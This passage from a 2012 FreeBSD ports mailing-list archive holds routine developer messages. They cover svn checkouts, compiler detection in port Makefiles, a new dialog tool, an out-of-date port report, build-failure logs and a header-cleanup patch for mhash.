Thu Nov 29 15:00:50 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 28353C6 for ; Thu, 29 Nov 2012 15:00:50 +0000 (UTC) (envelope-from wblock@wonkity.com) Received: from wonkity.com (wonkity.com [67.158.26.137]) by mx1.freebsd.org (Postfix) with ESMTP id D31F48FC08 for ; Thu, 29 Nov 2012 15:00:49 +0000 (UTC) Received: from wonkity.com (localhost [127.0.0.1]) by wonkity.com (8.14.5/8.14.5) with ESMTP id qATF0np1061210; Thu, 29 Nov 2012 08:00:49 -0700 (MST) (envelope-from wblock@wonkity.com) Received: from localhost (wblock@localhost) by wonkity.com (8.14.5/8.14.5/Submit) with ESMTP id qATF0mds061207; Thu, 29 Nov 2012 08:00:49 -0700 (MST) (envelope-from wblock@wonkity.com) Date: Thu, 29 Nov 2012 08:00:48 -0700 (MST) From: Warren Block To: Jeffrey Bouquet Subject: Re: /archivers/ is missing after svn... In-Reply-To: <1354193123.3531.YahooMailClassic@web164001.mail.gq1.yahoo.com> Message-ID: References: <1354193123.3531.YahooMailClassic@web164001.mail.gq1.yahoo.com> User-Agent: Alpine 2.00 (BSF 1167 2008-08-23) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-4.2.7 (wonkity.com [127.0.0.1]); Thu, 29 Nov 2012 08:00:49 -0700 (MST) Cc: freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 15:00:50 -0000 On Thu, 29 Nov 2012, Jeffrey Bouquet wrote: > UPDATE: > > OTOH I can svn it independently to elsewhere than ports, any canonical way > to move that /tmp/archivers to /usr/ports/archivers ? > > DONE: > moved that /tmp/archivers to /usr/ports/archivers, strangely I did not find its > .svn after the move. Multiple partial checkouts is not the same as one big checkout. The .svn directory only exists in the base directory of the checkout. Back up /usr/ports (for local changes), delete the entire directory, then check out the entire directory. From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 15:12:50 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id AB2E77B0 for ; Thu, 29 Nov 2012 15:12:50 +0000 (UTC) (envelope-from villa.alberto@gmail.com) Received: from mail-bk0-f54.google.com (mail-bk0-f54.google.com [209.85.214.54]) by mx1.freebsd.org (Postfix) with ESMTP id 34DC88FC0C for ; Thu, 29 Nov 2012 15:12:50 +0000 (UTC) Received: by mail-bk0-f54.google.com with SMTP id je9so6284506bkc.13 for ; Thu, 29 Nov 2012 07:12:48 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:sender:in-reply-to:references:from:date :x-google-sender-auth:message-id:subject:to:cc:content-type; bh=dz+5DUfvpBM2gQXH88SWhV9qKyps9XUozCvaKrZ6cUU=; b=QzMBZvC4ubc3fNTOzGw7/JcVie8eZIrAWAYEQAVf95uQLKDXabMZCagv9CtfVYdk91 bYCJYjqE/2xr7QEpjfSbHYFxhgaZTHH6EZJ9ChQk31k2uYAEToV08PaE8X6xuhCGY2pO i8PfhaX0NrbxWC5y/XH5itEUhuez8WrnxWR/Jxn+F16T+lJRkvV1KtVasmGCFAC242qo lAnsdyWi943NStHNYVL1oTpFMWuQUcM9i9jpWsoYOXzuoihEhTZrGPS0JVWDCl5Dqdgi LuLimRwpZKD5MaguyDiB7xexKkcdLAHuoKYEckgpMn91e/wZwT+I24AFweL36NQA8SlC UUzA== Received: by 10.204.6.20 with SMTP id 20mr7028770bkx.33.1354201968429; Thu, 29 Nov 2012 07:12:48 -0800 (PST) MIME-Version: 1.0 Sender: villa.alberto@gmail.com Received: by 10.204.8.155 with HTTP; Thu, 29 Nov 2012 07:12:28 -0800 (PST) In-Reply-To: <20121127162737.GB1790@oshi.local> References: <20121125114918.GA35966@oshi.local> <20121127162737.GB1790@oshi.local> From: Alberto Villa Date: Thu, 29 Nov 2012 16:12:28 +0100 X-Google-Sender-Auth: 3GYx-uG51zV-2VrJscCuIZjs27w Message-ID: Subject: Re: How to handle WITH_CLANG_IS_CC in ports To: Tobias Rehbein Content-Type: text/plain; charset=ISO-8859-1 Cc: Nikolai Lifanov , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 15:12:50 -0000 On Tue, Nov 27, 2012 at 5:27 PM, Tobias Rehbein wrote: > Is there any chance you turn this into a generic Mk macro? I don't think so, it would mean running `cc --version` on every bsd.port.mk inclusion. -- Alberto Villa, FreeBSD committer http://people.FreeBSD.org/~avilla From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 15:18:33 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id BD40FB34; Thu, 29 Nov 2012 15:18:33 +0000 (UTC) (envelope-from wblock@wonkity.com) Received: from wonkity.com (wonkity.com [67.158.26.137]) by mx1.freebsd.org (Postfix) with ESMTP id 725748FC16; Thu, 29 Nov 2012 15:18:33 +0000 (UTC) Received: from wonkity.com (localhost [127.0.0.1]) by wonkity.com (8.14.5/8.14.5) with ESMTP id qATFIWxB064084; Thu, 29 Nov 2012 08:18:32 -0700 (MST) (envelope-from wblock@wonkity.com) Received: from localhost (wblock@localhost) by wonkity.com (8.14.5/8.14.5/Submit) with ESMTP id qATFIV4O064081; Thu, 29 Nov 2012 08:18:32 -0700 (MST) (envelope-from wblock@wonkity.com) Date: Thu, 29 Nov 2012 08:18:31 -0700 (MST) From: Warren Block To: "Ilya A. Arkhipov" Subject: Re: Discussion concerning: New dialog for ports In-Reply-To: <695411354194775@web5g.yandex.ru> Message-ID: References: <695411354194775@web5g.yandex.ru> User-Agent: Alpine 2.00 (BSF 1167 2008-08-23) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-4.2.7 (wonkity.com [127.0.0.1]); Thu, 29 Nov 2012 08:18:32 -0700 (MST) Cc: kwm@freebsd.org, bapt@freebsd.org, Eitan Adler , Alexey Dokuchaev , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 15:18:33 -0000 On Thu, 29 Nov 2012, Ilya A. Arkhipov wrote: > Few week ago I started work on new dialog for ports, main idea it's > adding functionality, I guess you know ;) I took checklist.c from > libdialog and modified it for us. Regarding license, I discussed with > Thomas E. Dickey(author dialog) he said I can't change LGPL to BSD but > it should not be a problem. > What we have now: > - check + radio lists in on box (and yes we can put off radiobox) > - separate line with text > - dynamic width/height size Sounds familiar. :) Two lines for text would be good. > - all features from checklist.c :) > -- mouse support > -- hotkey for find a lines > My plan: > - add Help button/F1/alt-h/esc-1 (actually don't know how will be better) > - button for license Might want to call that "Port License" or such. Otherwise, it looks like it will show the license of the dialog program. > - fixing bugs >_< > - start work on parsing receiving data, after that should be ready for testing. > > Regarding parsing data I want discuss here. Wanna correct understand what will be better, now I have few variants: > 1. Get all data from env. variables > 2. Use the same with old dialog style, I mean receive from STDIN > 3. From file? <- guess bad idea > Your ideas? > > And certainly screeshots: > Big description(just for test); > In X -- http://imm.io/NkVR > In Terminal -- https://www.dropbox.com/s/bzt8zszpk40jrso/2012-11-29%2014.59.53.jpg > With license button: > in X -- http://imm.io/Nl9K > > You can find my repo there: https://bitbucket.org/m1cro/d4p/. I'll be happy for all response ;) Thanks for working on this! From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 15:26:09 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 094AE280 for ; Thu, 29 Nov 2012 15:26:09 +0000 (UTC) (envelope-from portscout@portscout.freebsd.org) Received: from null.zi0r.com (null.zi0r.com [71.245.171.204]) by mx1.freebsd.org (Postfix) with ESMTP id B8C618FC20 for ; Thu, 29 Nov 2012 15:26:08 +0000 (UTC) Received: from null.zi0r.com (localhost [127.0.0.1]) by null.zi0r.com (8.14.5/8.14.5) with ESMTP id qATFQ8Vh019985 for ; Thu, 29 Nov 2012 10:26:08 -0500 (EST) (envelope-from portscout@portscout.freebsd.org) Received: (from portscout@localhost) by null.zi0r.com (8.14.5/8.14.5/Submit) id qATFQ8on019827; Thu, 29 Nov 2012 10:26:08 -0500 (EST) (envelope-from portscout) Message-Id: <201211291526.qATFQ8on019827@null.zi0r.com> MIME-Version: 1.0 Content-Disposition: inline Content-Transfer-Encoding: 8bit Content-Type: text/plain Date: Thu, 29 Nov 2012 10:26:08 -0500 From: portscout@portscout.freebsd.org To: ports@freebsd.org Subject: FreeBSD ports you maintain which are out of date X-Mailer: portscout/0.8.1 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 15:26:09 -0000 Dear port maintainer, The portscout new distfile checker has detected that one or more of your ports appears to be out of date. Please take the opportunity to check each of the ports listed below, and if possible and appropriate, submit/commit an update. If any ports have already been updated, you can safely ignore the entry. You will not be e-mailed again for any of the port/version combinations below. Full details can be found at the following URL: http://portscout.freebsd.org/ports@freebsd.org.html Port | Current version | New version ------------------------------------------------+-----------------+------------ devel/pmd | 3.7 | 5.0.1 ------------------------------------------------+-----------------+------------ games/p5-Games-Dice | 0.02 | 0.03 ------------------------------------------------+-----------------+------------ net-mgmt/argus-monitor | 20100109 | 20121128 ------------------------------------------------+-----------------+------------ net-mgmt/p5-Net-IP | 1.25 | 1.26 ------------------------------------------------+-----------------+------------ If any of the above results are invalid, please check the following page for details on how to improve portscout's detection and selection of distfiles on a per-port basis: http://portscout.freebsd.org/info/portscout-portconfig.txt If wish to stop receiving portscout reminders, please contact portscout@portscout.freebsd.org Thanks. From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 16:30:36 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 6DDEF647; Thu, 29 Nov 2012 16:30:36 +0000 (UTC) (envelope-from awarecons@gmail.com) Received: from mail-vc0-f182.google.com (mail-vc0-f182.google.com [209.85.220.182]) by mx1.freebsd.org (Postfix) with ESMTP id F25F48FC17; Thu, 29 Nov 2012 16:30:35 +0000 (UTC) Received: by mail-vc0-f182.google.com with SMTP id fo13so20201677vcb.13 for ; Thu, 29 Nov 2012 08:30:29 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:date:message-id:subject:from:to:content-type; bh=0x+Lfak7ZxS2T8Fmr1vnTel2cP+o6c382UjENMFpJE8=; b=A9Ubm+WbKoLTjWLJV3G8YCm3b6fDPGXpYal5RaoTm6FWPinw9momzbM7vtftFMsiz+ MXOf0qPhhkj3P/6CJgDftKzGqKwUnU59+1BD/x0gUtqaKWKS+lFqu0KjXPq3u+EVzSeb q6L/vWA1zexMw1lorzRkBM9S7K9i/lFO4UHNqXpHJRE5uwoT/GNL5CJge5YqpGQjhYmH jtEv6Vz2eyvxZEX5p/3krkB39Vp9WTa8Hb54hl0vA0uG8fsC2GuxcvXnmO/aVfOnG1Pi oavJ42ugWNe03VmbE8CGF5Il2DIofwUPM7BZ9AhArA+M5dVsoDtGQLRZdnWderCfceQf TTtA== MIME-Version: 1.0 Received: by 10.52.26.242 with SMTP id o18mr28847084vdg.90.1354206628935; Thu, 29 Nov 2012 08:30:28 -0800 (PST) Received: by 10.220.230.138 with HTTP; Thu, 29 Nov 2012 08:30:28 -0800 (PST) Date: Thu, 29 Nov 2012 20:30:28 +0400 Message-ID: Subject: deskutils/fbreader ISSUE From: awarecons To: ports@freebsd.org, bugbusters@FreeBSD.org Content-Type: text/plain; charset=ISO-8859-1 X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 16:30:36 -0000 MASTER_SITES= http://www.fbreader.org/ should be appened with MASTER_SITES= http://www.fbreader.org/files/sources/ also sed patching error: # make ===> Extracting for fbreader-0.12.10_2 => SHA256 Checksum OK for fbreader-sources-0.12.10.tgz. ===> Patching for fbreader-0.12.10_2 ===> Applying FreeBSD patches for fbreader-0.12.10_2 sed: 1: "/^CFLAGS/s,--pipe.*$,-O ...": bad flag in substitute command: '-' *** Error code 1 Stop in /usr/ports/deskutils/fbreader. From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 16:46:47 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 59360576; Thu, 29 Nov 2012 16:46:47 +0000 (UTC) (envelope-from lifanov@mail.lifanov.com) Received: from mail.lifanov.com (mail.lifanov.com [206.125.175.12]) by mx1.freebsd.org (Postfix) with ESMTP id 21F3F8FC14; Thu, 29 Nov 2012 16:46:47 +0000 (UTC) Received: from [10.0.0.206] (cpe-174-109-075-092.nc.res.rr.com [174.109.75.92]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by mail.lifanov.com (Postfix) with ESMTPSA id 5795519ECC4; Thu, 29 Nov 2012 16:46:40 +0000 (UTC) Message-ID: <50B7916E.4070102@mail.lifanov.com> Date: Thu, 29 Nov 2012 11:46:38 -0500 From: Nikolai Lifanov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Alberto Villa Subject: Re: How to handle WITH_CLANG_IS_CC in ports References: <20121125114918.GA35966@oshi.local> <20121127162737.GB1790@oshi.local> In-Reply-To: Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Cc: Tobias Rehbein , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 16:46:47 -0000 On 11/29/2012 10:12 AM, Alberto Villa wrote:> On Tue, Nov 27, 2012 at 5:27 PM, Tobias Rehbein wrote: >> Is there any chance you turn this into a generic Mk macro? > > I don't think so, it would mean running `cc --version` on every > bsd.port.mk inclusion. > -- > Alberto Villa, FreeBSD committer > http://people.FreeBSD.org/~avilla > What I meant is to add something like a "setcc" target that port Makefiles (that need this) can call. This logic: setcc: @if [ ! -z "`cc -v 2>&1|grep clang`" ] ; then \ CC?= clang; \ else \ CC?= gcc; \ fi Or this logic: setcc: @if [ -z "$CC" ] ; then \ CC=`cc -v 2>&1|\ sed '/version/!d;s/.*\(clang\).*/\1/;s/.*\(gcc\).*/\1/'` fi Then, in the Makefile, use it like this: post-patch: setcc From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 16:49:41 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id B90CC681; Thu, 29 Nov 2012 16:49:41 +0000 (UTC) (envelope-from awarecons@gmail.com) Received: from mail-vc0-f182.google.com (mail-vc0-f182.google.com [209.85.220.182]) by mx1.freebsd.org (Postfix) with ESMTP id 4F20D8FC0C; Thu, 29 Nov 2012 16:49:40 +0000 (UTC) Received: by mail-vc0-f182.google.com with SMTP id fo13so20228244vcb.13 for ; Thu, 29 Nov 2012 08:49:40 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:date:message-id:subject:from:to:content-type; bh=2y3U98cw3CE3pG9veZoE71FOPjTMkhVmCyDlIWQA2GQ=; b=Ay5nb+VHbkgi2xemlJevj3INkqgsxbKt+uW99Y0bT6QIO0h8k5XzVBEVTEAYNITIbP Zb5hU8vO0KAAR5qPMi2YL/fOrj5kExpAE9TAOISrbu8q8Xk5nj2jzBkR1/iXBtuPQO7d SeK+zVJK1jp/k+KRIUYbnTMkOgECClsbJLe5X/cVHa6nz42ZyPJKjHMxUVSo2oh7um1M n/NcbipqC9D4QqNq717yCc141FGQgOq1t3Yhpsns0lc2swxkseNMt4UHNQFoZIyAY3WK DbEPBfwvWrGXtXRbSiZ7PSakamxrDEl7Ig7CqhAiELE8hlutDYgmozEtDWOZ8amVY6+c 62RQ== MIME-Version: 1.0 Received: by 10.52.70.83 with SMTP id k19mr27772502vdu.89.1354207780181; Thu, 29 Nov 2012 08:49:40 -0800 (PST) Received: by 10.220.230.138 with HTTP; Thu, 29 Nov 2012 08:49:40 -0800 (PST) Date: Thu, 29 Nov 2012 20:49:40 +0400 Message-ID: Subject: x11-toolkits/py-gnome-extras gtkmozembed ISSUE From: awarecons To: ports@freebsd.org, bugbusters@FreeBSD.org Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 16:49:41 -0000 py27-gnome-extras-2.25.3_13 Makefile needs to be appended with CFLAGS/CPPFLAGS GTKMOZEMBED_CFLAGS =3D -I/usr/local/include/libxul otherwise exception is raised gcc48 -DHAVE_CONFIG_H -I. -I.. -I/usr/local/include/python2.7 -D_REENTRANT -D_THREAD_SAFE -I/usr/local/include/pygtk-2.0 -I/usr/local/include/gtk-2.0 -I/usr/local/lib/libffi-3.0.9/include -I/usr/local/include/glib-2.0 -I/usr/local/include/atk-1.0 -I/usr/local/include/cairo -I/usr/local/include/gdk-pixbuf-2.0 -I/usr/local/include/pango-1.0 -I/usr/local/include/gio-unix-2.0/ -I/usr/local/include -I/usr/local/include/pixman-1 -I/usr/local/include/freetype2 -I/usr/local/include/libpng15 -I/usr/local/include -O2 -pipe -Wno-error -Wno-unused-parameter -Wno-unused-but-set-variable -Wno-unused-variable -Wno-unused-value -Wl,-rpath=3D/usr/local/lib/gcc48 -fno-strict-aliasing -Wall -MT gtkmozembed.lo -MD -MP -MF .deps/gtkmozembed.Tpo -c gtkmozembed.c -fPIC -DPIC -o .libs/gtkmozembed.o gtkmozembed.override:9:25: fatal error: gtkmozembed.h: No such file or directory #include ^ compilation terminated. gmake[2]: *** [gtkmozembed.lo] =EF=DB=C9=C2=CB=C1 1 gmake[2]: =F7=D9=C8=CF=C4 =C9=DA =CB=C1=D4=C1=CC=CF=C7=C1 `/usr/ports/x11-toolkits/py-gnome-extras/work/gnome-python-extras-2.25.3/gt= kmozembed' gmake[1]: *** [all-recursive] =EF=DB=C9=C2=CB=C1 1 gmake[1]: =F7=D9=C8=CF=C4 =C9=DA =CB=C1=D4=C1=CC=CF=C7=C1 `/usr/ports/x11-toolkits/py-gnome-extras/work/gnome-python-extras-2.25.3' gmake: *** [all] =EF=DB=C9=C2=CB=C1 2 *** Error code 1 Stop in /usr/ports/x11-toolkits/py-gnome-extras. From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 17:20:40 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id A1C48F1E; Thu, 29 Nov 2012 17:20:40 +0000 (UTC) (envelope-from awarecons@gmail.com) Received: from mail-vc0-f182.google.com (mail-vc0-f182.google.com [209.85.220.182]) by mx1.freebsd.org (Postfix) with ESMTP id 3F18E8FC08; Thu, 29 Nov 2012 17:20:39 +0000 (UTC) Received: by mail-vc0-f182.google.com with SMTP id fo13so20269294vcb.13 for ; Thu, 29 Nov 2012 09:20:39 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:date:message-id:subject:from:to:content-type; bh=adzgk9NcnbvhwBNzswU9vnVffZX72FAP/OAOvZr3BU0=; b=PTH98U+TgSU+pQ9TefX1cFY5BjQAwJdTUdbMPHWKVCL4BLxGIx89qJkEcl9/rmJhMw lsAkea97+fWzgG8j81L/uOfYTLD3H+A3FCU20jI2Iu0g4k9cHicOBxBImklN9OFX9Mcu 6a3rE2Pj37CvQhI8JaQllKLdNfDtHyYLKGnL3YQRnP2CEmmhro94NCRRfbrWiPll0JBl f3+IJ0qa32daBOM31W+A+fMiZYto7los8OsL0Bctu8jG5AoMgmN32kM3/getDzppGxHb DNd5RO++TMcP9eilwp9g/NW5B2NkLDlzXhL2qvsvCCD7uHvEYi6JLQ2vKuCv5Sh92NnV /q4Q== MIME-Version: 1.0 Received: by 10.220.247.204 with SMTP id md12mr30000709vcb.27.1354209639591; Thu, 29 Nov 2012 09:20:39 -0800 (PST) Received: by 10.220.230.138 with HTTP; Thu, 29 Nov 2012 09:20:39 -0800 (PST) Date: Thu, 29 Nov 2012 21:20:39 +0400 Message-ID: Subject: Chromium ISSUE with GCC 4.8 From: awarecons To: ports@freebsd.org, bugbusters@FreeBSD.org, gcc@gcc.gnu.org Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 17:20:40 -0000 FreeBSD 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:15:25 UTC 2012 root@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 chromium-23.0.1271.64_1 compiled perfectly. But chromium-23.0.1271.91 fails: ... In file included from ./base/global_descriptors_posix.h:15:0, from ./content/public/browser/content_browser_client.h:19, from content/public/app/content_main_delegate.cc:7: ./base/memory/singleton.h:135:73: internal compiler error: tree check: expected sizeof_expr, have alignof_expr in cp_tree_equal, at cp/tree.c:2608 template base::AlignedMemory ^ /proc/self/exe: No such file or directory Please submit a full bug report, with preprocessed source if appropriate. See for instructions. gmake: *** [out/Release/obj.target/content_app/content/public/app/content_main_delegat= e.o] =EF=DB=C9=C2=CB=C1 1 gmake: *** =EF=D6=C9=C4=C1=CE=C9=C5 =DA=C1=D7=C5=D2=DB=C5=CE=C9=D1 =DA=C1= =C4=C1=CE=C9=CA... In file included from ./base/global_descriptors_posix.h:15:0, from ./content/public/browser/content_browser_client.h:19, from content/app/content_main_runner.cc:31: ./base/memory/singleton.h: At global scope: ./base/memory/singleton.h:130:57: internal compiler error: tree check: expected sizeof_expr, have alignof_expr in cp_tree_equal, at cp/tree.c:2608 static base::AlignedMemory buffer_; ^ /proc/self/exe: No such file or directory Please submit a full bug report, with preprocessed source if appropriate. See for instructions. gmake: *** [out/Release/obj.target/content_app/content/app/content_main_runner.o] =EF=DB=C9=C2=CB=C1 1 *** Error code 1 Stop in /usr/ports/www/chromium. *** Error code 1 Stop in /usr/ports/www/chromium. From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 17:23:52 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 59EC8BD for ; Thu, 29 Nov 2012 17:23:52 +0000 (UTC) (envelope-from mats.andersson@gisladisker.se) Received: from mea.homelinux.org (unknown [IPv6:2001:470:28:6a:1::10]) by mx1.freebsd.org (Postfix) with ESMTP id D483A8FC17 for ; Thu, 29 Nov 2012 17:23:51 +0000 (UTC) Received: from meand by aun with local (Exim 4.69) (envelope-from ) id 1Te7q1-0001gD-Fw for ports@freebsd.org; Thu, 29 Nov 2012 18:23:50 +0100 Date: Thu, 29 Nov 2012 18:23:49 +0100 From: Mats Erik Andersson To: FreeBSD ports Message-ID: <20121129172349.GA6323@mea.homelinux.org> MIME-Version: 1.0 Content-Disposition: inline User-Agent: Mutt/1.5.18 (2008-05-17) X-SA-Exim-Connect-IP: X-SA-Exim-Rcpt-To: ports@freebsd.org X-SA-Exim-Mail-From: mats.andersson@gisladisker.se X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on aun.utmark.mea X-Spam-Level: X-Spam-Status: No, score=-2.6 required=5.0 tests=BAYES_00,NO_RELAYS autolearn=ham version=3.2.5 Subject: security/mhash: Prune polluting header file. Content-Type: multipart/mixed; boundary="pf9I7BMVVzbSWLtt" X-SA-Exim-Version: 4.2.1 (built Wed, 25 Jun 2008 17:14:11 +0000) X-SA-Exim-Scanned: Yes (on aun) X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 17:23:52 -0000 --pf9I7BMVVzbSWLtt Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Port: mhash-0.9.9.9-1 Problem: The port is installing the header file which defines all the macros PACKAGE, PACKAGE_BUGREPORT, PACKAGE_NAME PACKAGE_STRING, PACKAGE_TARNAME, PACKAGE_VERSION and even VERSION. All these macros are interfering with any secondary software, relying on the above header file. Thus the corresponding definitions are removed using the patch included in this letter. The result is equally amicable with Gcc as with Clang. Best regards, Mats Erik Andersson --pf9I7BMVVzbSWLtt Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="patch-include-mutils-mhash_config.h.in" Description: Remove polluting macros from header template. Upstream leaves macros like PACKAGE_NAME, PACKAGE_VERSION, etcetra, to be present in . . Since these are bound to disturb every other source using Autotools, the corresponding variables are removed. Author: Mats Erik Andersson Package: mhash-0.9.9.9. Last-Update: 2012-11-29 --- include/mutils/mhash_config.h.in.orig 2008-12-08 00:33:50.000000000 +0100 +++ include/mutils/mhash_config.h.in 2012-11-29 16:39:43.000000000 +0100 @@ -181,24 +181,6 @@ /* Define to 1 if your C compiler doesn't accept -c and -o together. */ #undef NO_MINUS_C_MINUS_O -/* Name of package */ -#undef PACKAGE - -/* Define to the address where bug reports for this package should be sent. */ -#undef PACKAGE_BUGREPORT - -/* Define to the full name of this package. */ -#undef PACKAGE_NAME - -/* Define to the full name and version of this package. */ -#undef PACKAGE_STRING - -/* Define to the one symbol short name of this package. */ -#undef PACKAGE_TARNAME - -/* Define to the version of this package. */ -#undef PACKAGE_VERSION - /* Define to 1 if the C compiler supports function prototypes. */ #undef PROTOTYPES @@ -208,9 +190,6 @@ /* dmalloc */ #undef USE_DMALLOC -/* Version number of package */ -#undef VERSION - /* Define if using the dmalloc debugging malloc package */ #undef WITH_DMALLOC --pf9I7BMVVzbSWLtt-- From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 17:51:28 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 32F4F93A; Thu, 29 Nov 2012 17:51:28 +0000 (UTC) (envelope-from yamayan@kbh.biglobe.ne.jp) Received: from rcpt-expgw.biglobe.ne.jp (rcpt-expgw.biglobe.ne.jp [IPv6:2001:260:401:16::3]) by mx1.freebsd.org (Postfix) with ESMTP id 73CB18FC1D; Thu, 29 Nov 2012 17:51:27 +0000 (UTC) Received: from vc-gw.biglobe.ne.jp by rcpt-expgw.biglobe.ne.jp (shby/5910021009) with SMTP id qATHpPVp013587; Fri, 30 Nov 2012 02:51:25 +0900 Received: from smtp-gw.biglobe.ne.jp ([172.21.175.156]) by vc-gw.biglobe.ne.jp (kbkr/0716090908) with ESMTP id qATHpPMd030202; Fri, 30 Nov 2012 02:51:25 +0900 X-Biglobe-Sender: Received: from [192.168.0.100] (KD027083060020.ppp-bb.dion.ne.jp [27.83.60.20]) by smtp-gw.biglobe.ne.jp id CAAZAC15AFDC; Fri, 30 Nov 2012 02:51:25 +0900 (JST) Message-ID: <50B7A0A3.8030604@kbh.biglobe.ne.jp> Date: Fri, 30 Nov 2012 02:51:31 +0900 From: Yamaya Takashi User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Nikolai Lifanov Subject: Re: How to handle WITH_CLANG_IS_CC in ports References: <20121125114918.GA35966@oshi.local> <20121127162737.GB1790@oshi.local> <50B7916E.4070102@mail.lifanov.com> In-Reply-To: <50B7916E.4070102@mail.lifanov.com> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Cc: Alberto Villa , Tobias Rehbein , freebsd-ports@freebsd.org X-BeenThere: 